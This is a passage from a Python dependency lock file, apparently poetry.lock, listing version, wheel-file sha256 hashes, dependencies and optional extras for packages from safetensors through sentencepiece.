"sha256:27a24ca8822c469ee452db4c13418ba983315a0d863c018a9af15f2305eac38c"}, {file = "safetensors-0.4.0-cp38-none-win32.whl", hash = "sha256:c4a0a47c8640167792d8261ee21b26430bbc39130a7edaad7f4c0bc05669d00e"}, {file = "safetensors-0.4.0-cp38-none-win_amd64.whl", hash = "sha256:a738970a367f39249e2abb900d9441a8a86d7ff50083e5eaa6e7760a9f216014"}, {file = "safetensors-0.4.0-cp39-cp39-macosx_10_7_x86_64.whl", hash = "sha256:806379f37e1abd5d302288c4b2f4186dd7ea7143d4c7811f90a8077f0ae8967b"}, {file = "safetensors-0.4.0-cp39-cp39-macosx_11_0_arm64.whl", hash 
= "sha256:2b9b94133ed2ae9dda0e95dcace7b7556eba023ffa4c4ae6df8f99377f571d6a"}, {file = "safetensors-0.4.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6b563a14c43614815a6b524d2e4edeaace50b717f7e7487bb227dd5b68350f5a"}, {file = "safetensors-0.4.0-cp39-cp39-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:00a9b157be660fb7ba88fa2eedd05ec93793a5b61e43e783e10cb0b995372802"}, {file = "safetensors-0.4.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c8f194f45ab6aa767993c24f0aeb950af169dbc5d611b94c9021a1d13b8a1a34"}, {file = "safetensors-0.4.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:469360b9451db10bfed3881378d5a71b347ecb1ab4f42367d77b8164a13af70b"}, {file = "safetensors-0.4.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f5f75fa97ccf32a3c7af476c6a0e851023197d3c078f6de3612008fff94735f9"}, {file = "safetensors-0.4.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:acf0180283c2efae72f1d8c0a4a7974662091df01be3aa43b5237b1e52ed0a01"}, {file = "safetensors-0.4.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:cd02b495ba0814619f40bda46771bb06dbbf1d42524b66fa03b2a736c77e4515"}, {file = "safetensors-0.4.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:c42bdea183dbaa99e2f0e6120dc524df79cf4289a6f90f30a534444ef20f49fa"}, {file = "safetensors-0.4.0-cp39-none-win32.whl", hash = "sha256:cef7bb5d9feae7146c3c3c7b3aef7d2c8b39ba7f5ff4252d368eb69462a47076"}, {file = "safetensors-0.4.0-cp39-none-win_amd64.whl", hash = "sha256:79dd46fb1f19282fd12f544471efb97823ede927cedbf9cf35550d92b349fdd2"}, {file = "safetensors-0.4.0-pp310-pypy310_pp73-macosx_10_7_x86_64.whl", hash = "sha256:002301c1afa32909f83745b0c124d002e7ae07e15671f3b43cbebd0ffc5e6037"}, {file = "safetensors-0.4.0-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:67762d36ae088c73d4a3c96bfc4ea8d31233554f35b6cace3a18533238d462ea"}, {file = "safetensors-0.4.0-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0f45230f20a206e5e4c7f7bbf9342178410c6f8b0af889843aa99045a76f7691"}, {file = "safetensors-0.4.0-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8f2ca939bbd8fb2f4dfa28e39a146dad03bc9325e9fc831b68f7b98f69a5a2f1"}, {file = "safetensors-0.4.0-pp310-pypy310_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:61a00f281391fae5ce91df70918bb61c12d2d514a493fd8056e12114be729911"}, {file = "safetensors-0.4.0-pp310-pypy310_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:435fd136a42492b280cb55126f9ce9535b35dd49df2c5d572a5945455a439448"}, {file = "safetensors-0.4.0-pp310-pypy310_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:f0daa788273d683258fb1e4a5e16bef4486b2fca536451a2591bc0f4a6488895"}, {file = "safetensors-0.4.0-pp37-pypy37_pp73-macosx_10_7_x86_64.whl", hash = "sha256:0620ab0d41e390ccb1c4ea8f63dc00cb5f0b96a5cdd3cd0d64c21765720c074a"}, {file = "safetensors-0.4.0-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bc1fa8d067733cb67f22926689ee808f08afacf7700d2ffb44efae90a0693eb1"}, {file = "safetensors-0.4.0-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dcaa40bc363edda145db75cd030f3b1822e5478d550c3500a42502ecef32c959"}, {file = "safetensors-0.4.0-pp37-pypy37_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:b561fbc044db7beff2ece0ec219a291809d45a38d30c6b38e7cc46482582f4ba"}, {file = "safetensors-0.4.0-pp37-pypy37_pp73-musllinux_1_1_aarch64.whl", hash = 
"sha256:79a983b09782dacf9a1adb19bb98f4a8f6c3144108939f572c047b5797e43cf5"}, {file = "safetensors-0.4.0-pp37-pypy37_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:10b65cd3ad79f5d0daf281523b4146bc271a34bb7430d4e03212e0de8622dab8"}, {file = "safetensors-0.4.0-pp38-pypy38_pp73-macosx_10_7_x86_64.whl", hash = "sha256:114decacc475a6a9e2f9102a00c171d113ddb5d35cb0bda0db2c0c82b2eaa9ce"}, {file = "safetensors-0.4.0-pp38-pypy38_pp73-macosx_11_0_arm64.whl", hash = "sha256:72ddb741dd5fe42521db76a70e012f76995516a12e7e0ef26be03ea9be77802a"}, {file = "safetensors-0.4.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6c5556c2ec75f5a6134866eddd7341cb36062e6edaea343478a279591b63ddba"}, {file = "safetensors-0.4.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ed50f239b0ce7ae85b078395593b4a351ede7e6f73af25f4873e3392336f64c9"}, {file = "safetensors-0.4.0-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:495dcaea8fbab70b927d2274e2547824462737acbf98ccd851a71124f779a5c6"}, {file = "safetensors-0.4.0-pp38-pypy38_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:3f4d90c79a65ba2fe2ff0876f6140748f0a3ce6a21e27a35190f4f96321803f8"}, {file = "safetensors-0.4.0-pp38-pypy38_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:7a524382b5c55b5fbb168e0e9d3f502450c8cf3fb81b93e880018437c206a482"}, {file = "safetensors-0.4.0-pp39-pypy39_pp73-macosx_10_7_x86_64.whl", hash = "sha256:9849ea60c7e840bfdd6030ad454d4a6ba837b3398c902f15a30460dd6961c28c"}, {file = "safetensors-0.4.0-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:6c42623ae7045615d9eaa6877b9df1db4e9cc71ecc14bcc721ea1e475dddd595"}, {file = "safetensors-0.4.0-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:80cb8342f00f3c41b3b93b1a599b84723280d3ac90829bc62262efc03ab28793"}, {file = "safetensors-0.4.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d8c4f5ed4ede384dea8c99bae76b0718a828dbf7b2c8ced1f44e3b9b1a124475"}, {file = "safetensors-0.4.0-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:40d7cf03493bfe75ef62e2c716314474b28d9ba5bf4909763e4b8dd14330c01a"}, {file = "safetensors-0.4.0-pp39-pypy39_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:232029f0a9fa6fa1f737324eda98a700409811186888536a2333cbbf64e41741"}, {file = "safetensors-0.4.0-pp39-pypy39_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:9ed55f4a20c78ff3e8477efb63c8303c2152cdfb3bfea4d025a80f54d38fd628"}, {file = "safetensors-0.4.0.tar.gz", hash = "sha256:b985953c3cf11e942eac4317ef3db3da713e274109cf7cfb6076d877054f013e"}, ] [package.extras] all = ["safetensors[jax]", "safetensors[numpy]", "safetensors[paddlepaddle]", "safetensors[pinned-tf]", "safetensors[quality]", "safetensors[testing]", "safetensors[torch]"] dev = ["safetensors[all]"] jax = ["flax (>=0.6.3)", "jax (>=0.3.25)", "jaxlib (>=0.3.25)", "safetensors[numpy]"] numpy = ["numpy (>=1.21.6)"] paddlepaddle = ["paddlepaddle (>=2.4.1)", "safetensors[numpy]"] pinned-tf = ["safetensors[numpy]", "tensorflow (==2.11.0)"] quality = ["black (==22.3)", "click (==8.0.4)", "flake8 (>=3.8.3)", "isort (>=5.5.4)"] tensorflow = ["safetensors[numpy]", "tensorflow (>=2.11.0)"] testing = ["h5py (>=3.7.0)", "huggingface_hub (>=0.12.1)", "hypothesis (>=6.70.2)", "pytest (>=7.2.0)", "pytest-benchmark (>=4.0.0)", "safetensors[numpy]", "setuptools_rust (>=1.5.2)"] torch = ["safetensors[numpy]", "torch (>=1.10)"] [[package]] name = "scikit-learn" version = "1.3.2" description = "A set of python modules for 
optional = true
python-versions = ">=3.8"
files = [
    {file = "scikit-learn-1.3.2.tar.gz", hash = "sha256:a2f54c76accc15a34bfb9066e6c7a56c1e7235dda5762b990792330b52ccfb05"},
    {file = "scikit_learn-1.3.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:e326c0eb5cf4d6ba40f93776a20e9a7a69524c4db0757e7ce24ba222471ee8a1"},
    {file = "scikit_learn-1.3.2-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:535805c2a01ccb40ca4ab7d081d771aea67e535153e35a1fd99418fcedd1648a"},
    {file = "scikit_learn-1.3.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1215e5e58e9880b554b01187b8c9390bf4dc4692eedeaf542d3273f4785e342c"},
    {file = "scikit_learn-1.3.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0ee107923a623b9f517754ea2f69ea3b62fc898a3641766cb7deb2f2ce450161"},
    {file = "scikit_learn-1.3.2-cp310-cp310-win_amd64.whl", hash = "sha256:35a22e8015048c628ad099da9df5ab3004cdbf81edc75b396fd0cff8699ac58c"},
    {file = "scikit_learn-1.3.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:6fb6bc98f234fda43163ddbe36df8bcde1d13ee176c6dc9b92bb7d3fc842eb66"},
    {file = "scikit_learn-1.3.2-cp311-cp311-macosx_12_0_arm64.whl", hash = "sha256:18424efee518a1cde7b0b53a422cde2f6625197de6af36da0b57ec502f126157"},
    {file = "scikit_learn-1.3.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3271552a5eb16f208a6f7f617b8cc6d1f137b52c8a1ef8edf547db0259b2c9fb"},
    {file = "scikit_learn-1.3.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fc4144a5004a676d5022b798d9e573b05139e77f271253a4703eed295bde0433"},
    {file = "scikit_learn-1.3.2-cp311-cp311-win_amd64.whl", hash = "sha256:67f37d708f042a9b8d59551cf94d30431e01374e00dc2645fa186059c6c5d78b"},
    {file = "scikit_learn-1.3.2-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:8db94cd8a2e038b37a80a04df8783e09caac77cbe052146432e67800e430c028"},
    {file = "scikit_learn-1.3.2-cp312-cp312-macosx_12_0_arm64.whl", hash = "sha256:61a6efd384258789aa89415a410dcdb39a50e19d3d8410bd29be365bcdd512d5"},
    {file = "scikit_learn-1.3.2-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cb06f8dce3f5ddc5dee1715a9b9f19f20d295bed8e3cd4fa51e1d050347de525"},
    {file = "scikit_learn-1.3.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5b2de18d86f630d68fe1f87af690d451388bb186480afc719e5f770590c2ef6c"},
    {file = "scikit_learn-1.3.2-cp312-cp312-win_amd64.whl", hash = "sha256:0402638c9a7c219ee52c94cbebc8fcb5eb9fe9c773717965c1f4185588ad3107"},
    {file = "scikit_learn-1.3.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:a19f90f95ba93c1a7f7924906d0576a84da7f3b2282ac3bfb7a08a32801add93"},
    {file = "scikit_learn-1.3.2-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:b8692e395a03a60cd927125eef3a8e3424d86dde9b2370d544f0ea35f78a8073"},
    {file = "scikit_learn-1.3.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:15e1e94cc23d04d39da797ee34236ce2375ddea158b10bee3c343647d615581d"},
    {file = "scikit_learn-1.3.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:785a2213086b7b1abf037aeadbbd6d67159feb3e30263434139c98425e3dcfcf"},
    {file = "scikit_learn-1.3.2-cp38-cp38-win_amd64.whl", hash = "sha256:64381066f8aa63c2710e6b56edc9f0894cc7bf59bd71b8ce5613a4559b6145e0"},
    {file = "scikit_learn-1.3.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:6c43290337f7a4b969d207e620658372ba3c1ffb611f8bc2b6f031dc5c6d1d03"},
    {file = "scikit_learn-1.3.2-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:dc9002fc200bed597d5d34e90c752b74df516d592db162f756cc52836b38fe0e"},
"sha256:dc9002fc200bed597d5d34e90c752b74df516d592db162f756cc52836b38fe0e"}, {file = "scikit_learn-1.3.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1d08ada33e955c54355d909b9c06a4789a729977f165b8bae6f225ff0a60ec4a"}, {file = "scikit_learn-1.3.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:763f0ae4b79b0ff9cca0bf3716bcc9915bdacff3cebea15ec79652d1cc4fa5c9"}, {file = "scikit_learn-1.3.2-cp39-cp39-win_amd64.whl", hash = "sha256:ed932ea780517b00dae7431e031faae6b49b20eb6950918eb83bd043237950e0"}, ] [package.dependencies] joblib = ">=1.1.1" numpy = ">=1.17.3,<2.0" scipy = ">=1.5.0" threadpoolctl = ">=2.0.0" [package.extras] benchmark = ["matplotlib (>=3.1.3)", "memory-profiler (>=0.57.0)", "pandas (>=1.0.5)"] docs = ["Pillow (>=7.1.2)", "matplotlib (>=3.1.3)", "memory-profiler (>=0.57.0)", "numpydoc (>=1.2.0)", "pandas (>=1.0.5)", "plotly (>=5.14.0)", "pooch (>=1.6.0)", "scikit-image (>=0.16.2)", "seaborn (>=0.9.0)", "sphinx (>=6.0.0)", "sphinx-copybutton (>=0.5.2)", "sphinx-gallery (>=0.10.1)", "sphinx-prompt (>=1.3.0)", "sphinxext-opengraph (>=0.4.2)"] examples = ["matplotlib (>=3.1.3)", "pandas (>=1.0.5)", "plotly (>=5.14.0)", "pooch (>=1.6.0)", "scikit-image (>=0.16.2)", "seaborn (>=0.9.0)"] tests = ["black (>=23.3.0)", "matplotlib (>=3.1.3)", "mypy (>=1.3)", "numpydoc (>=1.2.0)", "pandas (>=1.0.5)", "pooch (>=1.6.0)", "pyamg (>=4.0.0)", "pytest (>=7.1.2)", "pytest-cov (>=2.9.0)", "ruff (>=0.0.272)", "scikit-image (>=0.16.2)"] [[package]] name = "scipy" version = "1.9.3" description = "Fundamental algorithms for scientific computing in Python" optional = true python-versions = ">=3.8" files = [ {file = "scipy-1.9.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:1884b66a54887e21addf9c16fb588720a8309a57b2e258ae1c7986d4444d3bc0"}, {file = "scipy-1.9.3-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:83b89e9586c62e787f5012e8475fbb12185bafb996a03257e9675cd73d3736dd"}, {file = "scipy-1.9.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1a72d885fa44247f92743fc20732ae55564ff2a519e8302fb7e18717c5355a8b"}, {file = "scipy-1.9.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d01e1dd7b15bd2449c8bfc6b7cc67d630700ed655654f0dfcf121600bad205c9"}, {file = "scipy-1.9.3-cp310-cp310-win_amd64.whl", hash = "sha256:68239b6aa6f9c593da8be1509a05cb7f9efe98b80f43a5861cd24c7557e98523"}, {file = "scipy-1.9.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:b41bc822679ad1c9a5f023bc93f6d0543129ca0f37c1ce294dd9d386f0a21096"}, {file = "scipy-1.9.3-cp311-cp311-macosx_12_0_arm64.whl", hash = "sha256:90453d2b93ea82a9f434e4e1cba043e779ff67b92f7a0e85d05d286a3625df3c"}, {file = "scipy-1.9.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:83c06e62a390a9167da60bedd4575a14c1f58ca9dfde59830fc42e5197283dab"}, {file = "scipy-1.9.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:abaf921531b5aeaafced90157db505e10345e45038c39e5d9b6c7922d68085cb"}, {file = "scipy-1.9.3-cp311-cp311-win_amd64.whl", hash = "sha256:06d2e1b4c491dc7d8eacea139a1b0b295f74e1a1a0f704c375028f8320d16e31"}, {file = "scipy-1.9.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:5a04cd7d0d3eff6ea4719371cbc44df31411862b9646db617c99718ff68d4840"}, {file = "scipy-1.9.3-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:545c83ffb518094d8c9d83cce216c0c32f8c04aaf28b92cc8283eda0685162d5"}, {file = "scipy-1.9.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = 
"sha256:0d54222d7a3ba6022fdf5773931b5d7c56efe41ede7f7128c7b1637700409108"}, {file = "scipy-1.9.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cff3a5295234037e39500d35316a4c5794739433528310e117b8a9a0c76d20fc"}, {file = "scipy-1.9.3-cp38-cp38-win_amd64.whl", hash = "sha256:2318bef588acc7a574f5bfdff9c172d0b1bf2c8143d9582e05f878e580a3781e"}, {file = "scipy-1.9.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d644a64e174c16cb4b2e41dfea6af722053e83d066da7343f333a54dae9bc31c"}, {file = "scipy-1.9.3-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:da8245491d73ed0a994ed9c2e380fd058ce2fa8a18da204681f2fe1f57f98f95"}, {file = "scipy-1.9.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4db5b30849606a95dcf519763dd3ab6fe9bd91df49eba517359e450a7d80ce2e"}, {file = "scipy-1.9.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c68db6b290cbd4049012990d7fe71a2abd9ffbe82c0056ebe0f01df8be5436b0"}, {file = "scipy-1.9.3-cp39-cp39-win_amd64.whl", hash = "sha256:5b88e6d91ad9d59478fafe92a7c757d00c59e3bdc3331be8ada76a4f8d683f58"}, {file = "scipy-1.9.3.tar.gz", hash = "sha256:fbc5c05c85c1a02be77b1ff591087c83bc44579c6d2bd9fb798bb64ea5e1a027"}, ] [package.dependencies] numpy = ">=1.18.5,<1.26.0" [package.extras] dev = ["flake8", "mypy", "pycodestyle", "typing_extensions"] doc = ["matplotlib (>2)", "numpydoc", "pydata-sphinx-theme (==0.9.0)", "sphinx (!=4.1.0)", "sphinx-panels (>=0.5.2)", "sphinx-tabs"] test = ["asv", "gmpy2", "mpmath", "pytest", "pytest-cov", "pytest-xdist", "scikit-umfpack", "threadpoolctl"] [[package]] name = "semver" version = "3.0.2" description = "Python helper for Semantic Versioning (https://semver.org)" optional = true python-versions = ">=3.7" files = [ {file = "semver-3.0.2-py3-none-any.whl", hash = "sha256:b1ea4686fe70b981f85359eda33199d60c53964284e0cfb4977d243e37cf4bf4"}, {file = "semver-3.0.2.tar.gz", hash = "sha256:6253adb39c70f6e51afed2fa7152bcd414c411286088fb4b9effb133885ab4cc"}, ] [[package]] name = "send2trash" version = "1.8.2" description = "Send file to trash natively under Mac OS X, Windows and Linux" optional = false python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,>=2.7" files = [ {file = "Send2Trash-1.8.2-py3-none-any.whl", hash = "sha256:a384719d99c07ce1eefd6905d2decb6f8b7ed054025bb0e618919f945de4f679"}, {file = "Send2Trash-1.8.2.tar.gz", hash = "sha256:c132d59fa44b9ca2b1699af5c86f57ce9f4c5eb56629d5d55fbb7a35f84e2312"}, ] [package.extras] nativelib = ["pyobjc-framework-Cocoa", "pywin32"] objc = ["pyobjc-framework-Cocoa"] win32 = ["pywin32"] [[package]] name = "sentence-transformers" version = "2.2.2" description = "Multilingual text embeddings" optional = true python-versions = ">=3.6.0" files = [ {file = "sentence-transformers-2.2.2.tar.gz", hash = "sha256:dbc60163b27de21076c9a30d24b5b7b6fa05141d68cf2553fa9a77bf79a29136"}, ] [package.dependencies] huggingface-hub = ">=0.4.0" nltk = "*" numpy = "*" scikit-learn = "*" scipy = "*" sentencepiece = "*" torch = ">=1.6.0" torchvision = "*" tqdm = "*" transformers = ">=4.6.0,<5.0.0" [[package]] name = "sentencepiece" version = "0.1.99" description = "SentencePiece python wrapper" optional = true python-versions = "*" files = [ {file = "sentencepiece-0.1.99-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:0eb528e70571b7c02723e5804322469b82fe7ea418c96051d0286c0fa028db73"}, {file = "sentencepiece-0.1.99-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:77d7fafb2c4e4659cbdf303929503f37a26eabc4ff31d3a79bf1c5a1b338caa7"}, {file = 
"sentencepiece-0.1.99-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:be9cf5b9e404c245aeb3d3723c737ba7a8f5d4ba262ef233a431fa6c45f732a0"}, {file = "sentencepiece-0.1.99-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:baed1a26464998f9710d20e52607c29ffd4293e7c71c6a1f83f51ad0911ec12c"}, {file = "sentencepiece-0.1.99-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:9832f08bb372d4c8b567612f8eab9e36e268dff645f1c28f9f8e851be705f6d1"}, {file = "sentencepiece-0.1.99-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:019e7535108e309dae2b253a75834fc3128240aa87c00eb80732078cdc182588"}, {file = "sentencepiece-0.1.99-cp310-cp310-win32.whl", hash = "sha256:fa16a830416bb823fa2a52cbdd474d1f7f3bba527fd2304fb4b140dad31bb9bc"}, {file = "sentencepiece-0.1.99-cp310-cp310-win_amd64.whl", hash = "sha256:14b0eccb7b641d4591c3e12ae44cab537d68352e4d3b6424944f0c447d2348d5"}, {file = "sentencepiece-0.1.99-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:6d3c56f24183a1e8bd61043ff2c58dfecdc68a5dd8955dc13bab83afd5f76b81"}, {file = "sentencepiece-0.1.99-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ed6ea1819fd612c989999e44a51bf556d0ef6abfb553080b9be3d347e18bcfb7"}, {file = "sentencepiece-0.1.99-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:a2a0260cd1fb7bd8b4d4f39dc2444a8d5fd4e0a0c4d5c899810ef1abf99b2d45"}, {file = "sentencepiece-0.1.99-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8a1abff4d1ff81c77cac3cc6fefa34fa4b8b371e5ee51cb7e8d1ebc996d05983"}, {file = "sentencepiece-0.1.99-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:004e6a621d4bc88978eecb6ea7959264239a17b70f2cbc348033d8195c9808ec"}, {file = "sentencepiece-0.1.99-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:db361e03342c41680afae5807590bc88aa0e17cfd1a42696a160e4005fcda03b"}, {file = "sentencepiece-0.1.99-cp311-cp311-win32.whl", hash = "sha256:2d95e19168875b70df62916eb55428a0cbcb834ac51d5a7e664eda74def9e1e0"}, {file = "sentencepiece-0.1.99-cp311-cp311-win_amd64.whl", hash = "sha256:f90d73a6f81248a909f55d8e6ef56fec32d559e1e9af045f0b0322637cb8e5c7"}, {file = "sentencepiece-0.1.99-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:62e24c81e74bd87a6e0d63c51beb6527e4c0add67e1a17bac18bcd2076afcfeb"}, {file = "sentencepiece-0.1.99-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:57efcc2d51caff20d9573567d9fd3f854d9efe613ed58a439c78c9f93101384a"}, {file = "sentencepiece-0.1.99-cp36-cp36m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6a904c46197993bd1e95b93a6e373dca2f170379d64441041e2e628ad4afb16f"}, {file = "sentencepiece-0.1.99-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d89adf59854741c0d465f0e1525b388c0d174f611cc04af54153c5c4f36088c4"}, {file = "sentencepiece-0.1.99-cp36-cp36m-win32.whl", hash = "sha256:47c378146928690d1bc106fdf0da768cebd03b65dd8405aa3dd88f9c81e35dba"}, {file = "sentencepiece-0.1.99-cp36-cp36m-win_amd64.whl", hash = "sha256:9ba142e7a90dd6d823c44f9870abdad45e6c63958eb60fe44cca6828d3b69da2"}, {file = "sentencepiece-0.1.99-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:b7b1a9ae4d7c6f1f867e63370cca25cc17b6f4886729595b885ee07a58d3cec3"}, {file = "sentencepiece-0.1.99-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d0f644c9d4d35c096a538507b2163e6191512460035bf51358794a78515b74f7"}, {file = "sentencepiece-0.1.99-cp37-cp37m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = 
"sha256:c8843d23a0f686d85e569bd6dcd0dd0e0cbc03731e63497ca6d5bacd18df8b85"}, {file = "sentencepiece-0.1.99-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:33e6f690a1caebb4867a2e367afa1918ad35be257ecdb3455d2bbd787936f155"}, {file = "sentencepiece-0.1.99-cp37-cp37m-win32.whl", hash = "sha256:8a321866c2f85da7beac74a824b4ad6ddc2a4c9bccd9382529506d48f744a12c"}, {file = "sentencepiece-0.1.99-cp37-cp37m-win_amd64.whl", hash = "sha256:c42f753bcfb7661c122a15b20be7f684b61fc8592c89c870adf52382ea72262d"}, {file = "sentencepiece-0.1.99-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:85b476406da69c70586f0bb682fcca4c9b40e5059814f2db92303ea4585c650c"}, {file = "sentencepiece-0.1.99-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:cfbcfe13c69d3f87b7fcd5da168df7290a6d006329be71f90ba4f56bc77f8561"}, {file = "sentencepiece-0.1.99-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:445b0ec381af1cd4eef95243e7180c63d9c384443c16c4c47a28196bd1cda937"}, {file = "sentencepiece-0.1.99-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c6890ea0f2b4703f62d0bf27932e35808b1f679bdb05c7eeb3812b935ba02001"}, {file = "sentencepiece-0.1.99-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fb71af492b0eefbf9f2501bec97bcd043b6812ab000d119eaf4bd33f9e283d03"}, {file = "sentencepiece-0.1.99-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:27b866b5bd3ddd54166bbcbf5c8d7dd2e0b397fac8537991c7f544220b1f67bc"}, {file = "sentencepiece-0.1.99-cp38-cp38-win32.whl", hash = "sha256:b133e8a499eac49c581c3c76e9bdd08c338cc1939e441fee6f92c0ccb5f1f8be"}, {file = "sentencepiece-0.1.99-cp38-cp38-win_amd64.whl", hash = "sha256:0eaf3591dd0690a87f44f4df129cf8d05d8a4029b5b6709b489b8e27f9a9bcff"}, {file = "sentencepiece-0.1.99-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:38efeda9bbfb55052d482a009c6a37e52f42ebffcea9d3a98a61de7aee356a28"}, {file = "sentencepiece-0.1.99-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:6c030b081dc1e1bcc9fadc314b19b740715d3d566ad73a482da20d7d46fd444c"}, {file = "sentencepiece-0.1.99-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:84dbe53e02e4f8a2e45d2ac3e430d5c83182142658e25edd76539b7648928727"}, {file = "sentencepiece-0.1.99-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0b0f55d0a0ee1719b4b04221fe0c9f0c3461dc3dabd77a035fa2f4788eb3ef9a"}, {file = "sentencepiece-0.1.99-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = 